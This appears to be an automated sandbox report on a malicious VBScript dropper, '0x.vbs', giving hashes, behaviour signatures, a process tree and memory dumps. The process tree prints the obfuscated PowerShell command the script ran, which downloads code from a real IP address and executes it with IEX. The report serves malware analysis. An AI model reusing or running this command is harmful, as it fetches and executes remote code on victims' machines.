Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    19-03-2024 20:57

General

  • Target

    0x.vbs

  • Size

    62KB

  • MD5

    34d6b90b676cf2fe59153c0c01b59278

  • SHA1

    396c2789cf583c24b047976dc91584aa703c067a

  • SHA256

    acec28de93d3ea0afc8d7101cadc56f07ef03492d1b398769c2d20e358b3b846

  • SHA512

    f20cfcd266b691c70f530b92244dd80eddbd5a5c19d1c08bd6b330ff15217e8fef5ca221adabdc75fc2ac1cb4aae8e729073fe85e13c43a89f5cb56c0310af2f

  • SSDEEP

    1536:y9V9A9J9v9/9U9U9v9U9v9A9m9v9/9U9U9v9U9v:F

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://193.233.132.136/a/a.png

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0x.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://193.233.132.136/a/a.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2892

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2892-4-0x000000001B2A0000-0x000000001B582000-memory.dmp
    Filesize

    2.9MB

  • memory/2892-5-0x0000000002310000-0x0000000002318000-memory.dmp
    Filesize

    32KB

  • memory/2892-7-0x00000000028B0000-0x0000000002930000-memory.dmp
    Filesize

    512KB

  • memory/2892-8-0x00000000028B0000-0x0000000002930000-memory.dmp
    Filesize

    512KB

  • memory/2892-9-0x00000000028B0000-0x0000000002930000-memory.dmp
    Filesize

    512KB

  • memory/2892-6-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
    Filesize

    9.6MB

  • memory/2892-10-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
    Filesize

    9.6MB

  • memory/2892-11-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
    Filesize

    9.6MB

  • memory/2892-12-0x00000000028B0000-0x0000000002930000-memory.dmp
    Filesize

    512KB

  • memory/2892-13-0x00000000028B0000-0x0000000002930000-memory.dmp
    Filesize

    512KB

  • memory/2892-14-0x00000000028B0000-0x0000000002930000-memory.dmp
    Filesize

    512KB

  • memory/2892-15-0x00000000028B0000-0x0000000002930000-memory.dmp
    Filesize

    512KB

  • memory/2892-17-0x0000000002940000-0x0000000002952000-memory.dmp
    Filesize

    72KB

  • memory/2892-18-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp
    Filesize

    9.6MB